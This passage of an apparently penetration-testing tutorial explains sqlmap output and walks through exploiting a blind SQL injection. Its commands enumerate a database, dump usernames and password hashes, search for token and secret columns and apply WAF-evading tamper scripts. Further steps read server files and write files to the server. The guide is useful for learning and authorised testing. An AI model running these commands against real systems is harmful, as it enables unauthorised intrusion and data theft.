HTTP codes, regular expressions or solely on the textual content of the page. These settings become useful when a timestamp, a token, a dynamic component or a custom field interferes with the comparison of responses.<\/p>\n\n\n\n<h2 id=\"interpreting-the-results-returned-by-sqlmap\" class=\"wp-block-heading\">Interpreting the Results Returned by SQLmap<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Effective use of sqlmap involves more than simply waiting for the tool to report that a parameter is injectable. The information returned helps you understand where the injection lies, which technique works, and how sqlmap confirmed it.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let\u2019s take a simplified example of the output:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap identified the following injection point(s):\n\n---\nParameter: TrackingId (Cookie)\n\n    Type: boolean-based blind\n    Title: AND boolean-based blind - WHERE or HAVING clause\n    Payload: TrackingId=abc123' AND 4821=4821-- -\n\n    Type: time-based blind\n    Title: PostgreSQL > 8.1 AND time-based blind\n    Payload: TrackingId=abc123' AND 9137=(SELECT 9137 FROM PG_SLEEP(5))-- -\n---\n\nback-end DBMS: PostgreSQL<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The random values generated in the payloads may vary from one execution to the next, but the structure of the output remains particularly useful for understanding the vulnerability.<\/p>\n\n\n\n<h3 id=\"parameter-identify-the-injection-point\" class=\"wp-block-heading\">Parameter: identify the injection point<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The first piece of information to look at is:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Parameter: TrackingId (Cookie)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This indicates that the injection was identified in the TrackingId cookie.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Depending on the context, sqlmap may also return:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Parameter: id (GET)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Parameter: search (POST)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This check is important when the request contains multiple values. It confirms that the tool is indeed exploiting the parameter identified during manual testing.<\/p>\n\n\n\n<h3 id=\"type-understanding-exploitation-techniques\" class=\"wp-block-heading\">Type: understanding exploitation techniques<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The \u2018Type\u2019 field corresponds to the injection family used.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In our example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Type: boolean-based blind<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">means that sqlmap can deduce information by observing the differences between true and false SQL conditions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The presence of:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Type: time-based blind<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">indicates that the same vulnerability can also be exploited based on response time.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Several techniques may therefore be valid simultaneously. When a fast method allows information to be retrieved directly or efficiently, it is generally preferable to prioritise it rather than relying solely on a time-based blind.<\/p>\n\n\n\n<h3 id=\"title-understanding-the-identified-sql-context\" class=\"wp-block-heading\">Title: understanding the identified SQL context<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The \u2018Title\u2019 field specifies the technique and context of the validated payload.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Title: AND boolean-based blind - WHERE or HAVING clause<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">indicates that the proof relies on the addition of an AND condition in a context compatible with a WHERE or HAVING clause.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Similarly:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Title: PostgreSQL > 8.1 AND time-based blind<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">shows that the validated payload uses a time-based primitive suitable for PostgreSQL.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This information becomes particularly useful when one wishes to manually reproduce the injection or understand the likely structure of the vulnerable query.<\/p>\n\n\n\n<h3 id=\"payload-analysing-the-evidence-of-injection\" class=\"wp-block-heading\">Payload: analysing the evidence of injection<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The Payload field shows the value that enabled sqlmap to confirm the injection point.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Payload: TrackingId=abc123' AND 4821=4821-- -<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The principle can be likened to a query such as:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>... WHERE tracking_id = 'abc123'\nAND 4821 = 4821<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The condition:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>4821 = 4821<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">is true. Sqlmap can simulate a false condition to obtain an oracle for blind exploitation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In a time-based scenario, the payload may contain a function that generates a delay:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Payload: TrackingId=abc123' AND 9137=(SELECT 9137 FROM PG_SLEEP(5))-- -<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The delay is not the vulnerability itself. It simply serves as an observable channel to transform an invisible SQL condition in the HTTP response into a measurable signal.<\/p>\n\n\n\n<h3 id=\"identify-the-dbms-and-the-technical-context\" class=\"wp-block-heading\">Identify the DBMS and the technical context<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Once the injection has been confirmed, sqlmap usually attempts to identify the DBMS:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>back-end DBMS: PostgreSQL<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Depending on what it manages to determine, the output may contain further information:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>web server operating system: Linux\nweb application technology: nginx, PHP\nback-end DBMS: PostgreSQL 14<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Identifying the DBMS is important because the syntax, available functions, system tables and post-exploitation possibilities differ significantly from one engine to another.<\/p>\n\n\n\n<h2 id=\"exploiting-an-sql-injection-with-sqlmap\" class=\"wp-block-heading\">Exploiting an SQL Injection with SQLmap<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Let us now consider a scenario in which an SQL injection has been identified in a TrackingId cookie.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The following request was captured using Burp Suite and then saved to request.txt:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/ HTTP\/1.1\nHost: target.example\nCookie: TrackingId=abc123*; session=eyJhbGciOi...\nUser-Agent: Mozilla\/5.0\nAccept: text\/html\nConnection: close<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The * character indicates precisely where sqlmap must insert its payloads.<\/p>\n\n\n\n<h3 id=\"confirm-the-injection\" class=\"wp-block-heading\">Confirming the injection<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">We\u2019ll start with a simple command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -r request.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">A simplified output might look like this:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;INFO] testing connection to the target URL\n&#91;INFO] testing if Cookie parameter 'TrackingId' is dynamic\n&#91;INFO] Cookie parameter 'TrackingId' appears to be dynamic\n&#91;INFO] testing for SQL injection on Cookie parameter 'TrackingId'\n\n&#91;INFO] Cookie parameter 'TrackingId' appears to be\n'AND boolean-based blind - WHERE or HAVING clause' injectable\n\n&#91;INFO] testing 'PostgreSQL > 8.1 AND time-based blind'\n&#91;INFO] Cookie parameter 'TrackingId' appears to be\n'PostgreSQL > 8.1 AND time-based blind' injectable\n\nsqlmap identified the following injection point(s):\n\n---\nParameter: TrackingId (Cookie)\n\n    Type: boolean-based blind\n    Title: AND boolean-based blind - WHERE or HAVING clause\n    Payload: TrackingId=abc123' AND 4821=4821-- -\n\n    Type: time-based blind\n    Title: PostgreSQL > 8.1 AND time-based blind\n    Payload: TrackingId=abc123' AND 9137=(SELECT 9137 FROM PG_SLEEP(5))-- -\n---\n\nback-end DBMS: PostgreSQL<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We can draw three key conclusions from this: the injection point is indeed the TrackingId cookie, at least two techniques work, and the DBMS is PostgreSQL.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Where a boolean-based blind exploit is available, it will generally be preferred over an exploit relying solely on time delays.<\/p>\n\n\n\n<h3 id=\"identify-the-context-of-the-sql-connection\" class=\"wp-block-heading\">Identifying the context of the SQL connection<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Before listing the business data, it is useful to understand the context in which the application communicates with the DBMS.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --banner \\\n  --current-user \\\n  --current-db \\\n  --hostname \\\n  --is-dba<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">A simplified output might look like this:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;INFO] fetching banner\nbanner: 'PostgreSQL 14.11'\n\n&#91;INFO] fetching current user\ncurrent user: 'webapp'\n\n&#91;INFO] fetching current database\ncurrent database: 'application'\n\n&#91;INFO] fetching server hostname\nhostname: 'db-prod-01'\n\n&#91;INFO] testing if current user is DBA\ncurrent user is DBA: False<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The result &#8220;current user is DBA: False&#8221; does not mean that the injection has no impact. It simply indicates that certain operations requiring elevated privileges may be impossible.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This information is important to avoid confusing data access with administrative control of the DBMS.<\/p>\n\n\n\n<h3 id=\"list-the-accessible-bases\" class=\"wp-block-heading\">Listing the accessible bases<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">To instruct sqlmap to list the databases visible to the current user:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --dbs<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The output might, for example, look like this:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;INFO] fetching database names\n\navailable databases &#91;3]:\n&#91;*] application\n&#91;*] postgres\n&#91;*] template1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The \u2018application\u2019 database here appears to correspond to the database used by the application under audit. The other entries may relate to the operation of the DBMS and are not necessarily relevant to this demonstration.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The aim is therefore not to automatically extract all accessible data, but to determine which scope is relevant for the risk assessment.<\/p>\n\n\n\n<h3 id=\"list-the-tables\" class=\"wp-block-heading\">Listing the tables<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">For traditional DBMSs, -D specifies the database to be enumerated. However, PostgreSQL has a special feature in sqlmap: to enumerate the tables in the current database, the tool requires the use of \u2018public\u2019, which represents the schema accessible to the application in this context.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The command can therefore be:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -D public \\\n  --tables<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">A simplified output:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Database: public\n\n&#91;4 tables]\n+------------------+\n| audit_logs       |\n| password_resets  |\n| tracking         |\n| users            |\n+------------------+<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It is important to understand that the display \u2018Database: public\u2019 here corresponds to the representation used by sqlmap for the accessible PostgreSQL schema, and not to a claim that a PostgreSQL database named \u2018public\u2019 actually exists.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The \u2018users\u2019 table appears to be sufficient to continue the demonstration.<\/p>\n\n\n\n<h3 id=\"examining-the-structure-of-a-table\" class=\"wp-block-heading\">Examining the structure of a table<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">We can then list the columns:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -D public \\\n  -T users \\\n  --columns<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Output example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Database: public\nTable: users\n\n&#91;5 columns]\n+------------+-------------------+\n| Column     | Type              |\n+------------+-------------------+\n| id         | integer           |\n| username   | character varying |\n| email      | character varying |\n| password   | character varying |\n| role       | character varying |\n+------------+-------------------+<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This step allows you to understand the table structure before any extraction takes place. Above all, it prevents you from running a dump without knowing what information will be retrieved.<\/p>\n\n\n\n<h3 id=\"understanding-data-volume\" class=\"wp-block-heading\">Understanding data volume<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Before an extraction, the \u2013count option allows you to find out the number of inputs:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -D public \\\n  -T users \\\n  --count<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Database: public\n\n+-------+---------+\n| Table | Entries |\n+-------+---------+\n| users | 18427   |\n+-------+---------+<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This information should inform the testing strategy. Extracting 18,427 users simply to prove the injection would be unnecessarily intrusive.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A few representative records are generally sufficient to establish that the data is accessible.<\/p>\n\n\n\n<h3 id=\"extract-only-the-necessary-data\" class=\"wp-block-heading\">Extract only the necessary data<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">To target specific columns:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -D public \\\n  -T users \\\n  -C username,password \\\n  --dump<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">An article\u2019s output may deliberately mask sensitive values:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Database: public\nTable: users\n\n+---------------+-------------------------+\n| username      | password                |\n+---------------+-------------------------+\n| administrator | $2b$12$REDACTED...      |\n| test-user     | $2b$12$REDACTED...      |\n| demo          | $2b$12$REDACTED...      |\n+---------------+-------------------------+<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">To further limit the extraction:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -D public \\\n  -T users \\\n  -C username,password \\\n  --dump \\\n  --start=1 \\\n  --stop=3<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It is also possible to use \u2013where when you wish to target a specific condition.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The key principle to remember is simple: enumerate first, assess the volume, then extract only what is necessary to demonstrate the impact.<\/p>\n\n\n\n<h2 id=\"how-does-sqlmap-exploit-blind-sql-injections\" class=\"wp-block-heading\">How Does SQLmap Exploit Blind SQL Injections?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">A blind SQL injection has one key characteristic: the result of the injected query is not directly displayed in the HTTP response.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This does not mean that no information can be retrieved. The auditor simply needs an indirect indicator that allows them to distinguish between a true and a false condition.<\/p>\n\n\n\n<h3 id=\"boolean-based-blind-sql-injection\" class=\"wp-block-heading\">Boolean-based blind SQL injection<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Let\u2019s take a deliberately simplified example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>AND SUBSTRING(\n    (SELECT password FROM users WHERE username='administrator'),\n    1,\n    1\n) = '5'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The application does not return the password directly. However, if the content of the response changes depending on whether the condition is true or false, it becomes possible to test different values.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">If the response matches a true condition for 5, we know that the first character is 5. The same operation can then be repeated for the subsequent characters.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Carrying out this extraction manually is useful for understanding the mechanism, but quickly becomes tedious. Sqlmap automates precisely this sequence of tests.<\/p>\n\n\n\n<h3 id=\"time-based-blind-sql-injection\" class=\"wp-block-heading\">Time-based blind SQL injection<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">When HTTP responses show no exploitable differences, the response time can be used as a channel.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The principle involves instructing the DBMS to introduce a delay only when a condition is true. On PostgreSQL, a mechanism similar to PG_SLEEP() can be utilised by context-specific payloads.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap then measures the server\u2019s behaviour and uses a temporal model to distinguish between deliberate delays and normal latency.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The reference value can be adjusted using \u2013time-sec:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --technique=T \\\n  --time-sec=5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This technique is generally much slower than a method capable of retrieving information directly or indirectly without introducing a delay.<\/p>\n\n\n\n<h3 id=\"understanding-the-cost-of-a-blind-extraction\" class=\"wp-block-heading\">Understanding the cost of a blind extraction<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">During a blind SQL injection, a simple output such as:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;INFO] fetching current database\n&#91;INFO] retrieved: application<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">can mask numerous HTTP requests.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Behind this line, sqlmap may well have had to determine the length of the value and then reconstruct its characters based on multiple conditions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In a time-based SQLi, this overhead becomes even greater, as each relevant condition can introduce a delay of several seconds.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This is why an option such as:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>--dump-all<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">is rarely a good first choice for a blind injection. A targeted exploit reduces the audit time, the traffic generated and the impact on the infrastructure.<\/p>\n\n\n\n<h2 id=\"going-further-with-enumeration-using-sqlmap\" class=\"wp-block-heading\">Going Further with Enumeration using SQLmap<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap is not limited to \u2013dbs, \u2013tables, \u2013columns and \u2013dump. Once an injection has been confirmed, there are several options available to gain a more detailed understanding of the environment.<\/p>\n\n\n\n<h3 id=\"identify-users-roles-and-privileges\" class=\"wp-block-heading\">Identify users, roles and privileges<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013users is used to attempt to enumerate the accounts known to the DBMS:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --users<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013privileges is used to identify the associated privileges when the DBMS exposes this information:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --privileges<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013roles can also be used to enumerate roles:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --roles<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The aim is not necessarily to retrieve all available accounts, but to determine whether the application is running with a user who has unusually high privileges.<\/p>\n\n\n\n<h3 id=\"search-for-a-specific-table-or-column\" class=\"wp-block-heading\">Search for a specific table or column<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">In a large environment, manually browsing through all the tables can be inefficient.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013search allows you to search for database, table or column names. For example, a targeted search for columns:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --search \\\n  -C password,token,secret<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This feature is useful when you want to quickly confirm whether a specific category of data is exposed without enumerating the entire schema.<\/p>\n\n\n\n<h3 id=\"execute-a-targeted-sql-query\" class=\"wp-block-heading\">Execute a targeted SQL query<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">When the auditor knows exactly which query is required to validate a hypothesis, the \u2013sql-query option allows a targeted query to be executed:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --sql-query=\"SELECT current_user\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013sql-shell provides an interactive interface:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --sql-shell<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">These capabilities must be used with caution. A SELECT query is read-only, but other statements may modify the database where the injection technique and privileges allow.<\/p>\n\n\n\n<h2 id=\"optimising-sqlmap-without-overloading-the-application\" class=\"wp-block-heading\">Optimising SQLmap Without Overloading the Application<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap can generate a significant amount of traffic, particularly during a blind extraction. There are several options available to customise its behaviour.<\/p>\n\n\n\n<h3 id=\"speed-up-certain-processes-using-threads\" class=\"wp-block-heading\">Speed up certain processes using \u2013threads<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013threads increases the number of concurrent requests:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --threads=5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This option can speed up certain phases of the extraction process, but it should be used with caution. Too high a level of parallelism can increase the load on the application, the web server or the DBMS.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It may also interfere with the interpretation of an injection that relies on response time.<\/p>\n\n\n\n<h3 id=\"slow-down-requests-using-delay\" class=\"wp-block-heading\">Slow down requests using \u2013delay<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Conversely, the \u2013delay option allows you to add a delay between requests:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --delay=0.5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This option can be useful when the infrastructure is load-sensitive or when the application enforces rate limiting.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The aim is not to automatically bypass security measures, but to adapt the pace of testing to the conditions defined for the audit.<\/p>\n\n\n\n<h3 id=\"understanding-and-resetting-sqlmap-sessions\" class=\"wp-block-heading\">Understanding and resetting sqlmap sessions<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap retains information already obtained about a target: DBMS, injection point, structure already retrieved, etc.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This persistence speeds up subsequent tests, but can be misleading when a query has changed.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To force a new analysis:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --flush-session<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This option is particularly useful when a change to the configuration, session or payload does not appear to have been taken into account.<\/p>\n\n\n\n<h3 id=\"enforce-https-where-necessary\" class=\"wp-block-heading\">Enforce HTTPS where necessary<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">When working with a raw query or a log file that does not allow sqlmap to correctly infer the protocol, the \u2013force-ssl option can be used to force HTTPS:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --force-ssl<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This option is useful in certain scenarios when importing queries, particularly when the file does not explicitly contain schema information.<\/p>\n\n\n\n<h2 id=\"using-tamper-scripts-with-sqlmap\" class=\"wp-block-heading\">Using Tamper Scripts with SQLmap<\/h2>\n\n\n\n<h3 id=\"understanding-the-role-of-tampers\" class=\"wp-block-heading\">Understanding the role of tampers<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Tamper scripts modify the payloads generated by sqlmap before they are sent. They can be useful when an application filter, custom validation or a WAF blocks a specific representation of an SQL query, whilst an equivalent syntax is still accepted by the DBMS.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The option used is:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --tamper=space2comment<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Several scripts can be combined:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --tamper=space2comment,randomcase<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap then applies the transformations defined by these scripts to the payloads before they are sent.<\/p>\n\n\n\n<h3 id=\"space2comment-py\" class=\"wp-block-heading\">space2comment.py<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">space2comment.py replaces some spaces with SQL comments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">An expression such as:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT username FROM users<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">can be represented with comments between certain elements:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT\/**\/username\/**\/FROM\/**\/users<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This transformation can help bypass a very simple filter that blocks spaces but allows an equivalent syntax to pass through, which is interpreted correctly by the DBMS.<\/p>\n\n\n\n<h3 id=\"randomcase-py\" class=\"wp-block-heading\">randomcase.py<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">randomcase.py changes the case of certain SQL keywords.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">may become:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SeLeCt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This transformation can be useful against a poorly designed filter that performs a case-sensitive comparison, whilst the DBMS does not treat the keyword in the same way.<\/p>\n\n\n\n<h3 id=\"equaltolike-py\" class=\"wp-block-heading\">equaltolike.py<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">equaltolike.py replaces the = operator with LIKE in compatible contexts.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM users WHERE id=1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">can become:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM users WHERE id LIKE 1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This script is designed for certain DBMSs such as MySQL, MariaDB, SQLite, Microsoft SQL Server or Oracle. In particular, it is not suitable for PostgreSQL when used in equivalent numerical comparisons, which illustrates why a tamper must always be chosen according to the engine and the context.<\/p>\n\n\n\n<h3 id=\"do-not-stack-the-tampers-randomly\" class=\"wp-block-heading\">Do not stack the tampers randomly<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The most important thing is not to know as many scripts as possible, but to understand the filtering mechanisms encountered.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A good approach is to examine the original payload, modify one element at a time, and identify precisely what triggers the block. Once the behaviour is understood, a suitable tamper can be selected.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Conversely, stacking numerous scripts without understanding how they are transformed can result in incompatible payloads, complicate diagnosis and generate a large number of unnecessary requests.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tampers should therefore be regarded as a targeted transformation mechanism, rather than a \u2018magic\u2019 option that automatically bypasses any WAF.<\/p>\n\n\n\n<h2 id=\"from-sql-injection-to-server-compromise\" class=\"wp-block-heading\">From SQL Injection to Server Compromise<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">One of the reasons why certain SQLi attacks are particularly critical is that their impact can sometimes extend beyond the database.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, an SQL injection does not automatically mean that commands will be executed on the operating system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Several conditions must be met: the DBMS must offer a vulnerable feature, the injection technique must enable the required operation, and the SQL user must have sufficient privileges.<\/p>\n\n\n\n<h3 id=\"read-a-file-using-file-read\" class=\"wp-block-heading\">Reading a file using \u2013file-read<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap can attempt to read a file accessible from the server\u2019s file system:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --file-read=\"\/etc\/hostname\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This capability is documented for several DBMSs, including MySQL, PostgreSQL, Microsoft SQL Server, Oracle and H2, provided the necessary privileges are available.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In a penetration test, reading a non-sensitive file may be sufficient to demonstrate that the injection allows one to go beyond the strict scope of application data. It is not usually necessary to retrieve sensitive files at will to confirm the impact.<\/p>\n\n\n\n<h3 id=\"writing-to-a-file-using-file-write-and-file-dest\" class=\"wp-block-heading\">Writing to a file using \u2013file-write and \u2013file-dest<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap also offers mechanisms for writing files:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --file-write=\".\/proof.txt\" \\\n  --file-dest=\"\/tmp\/proof.txt\"<\/code><\/pre>\n\n\n\n<p 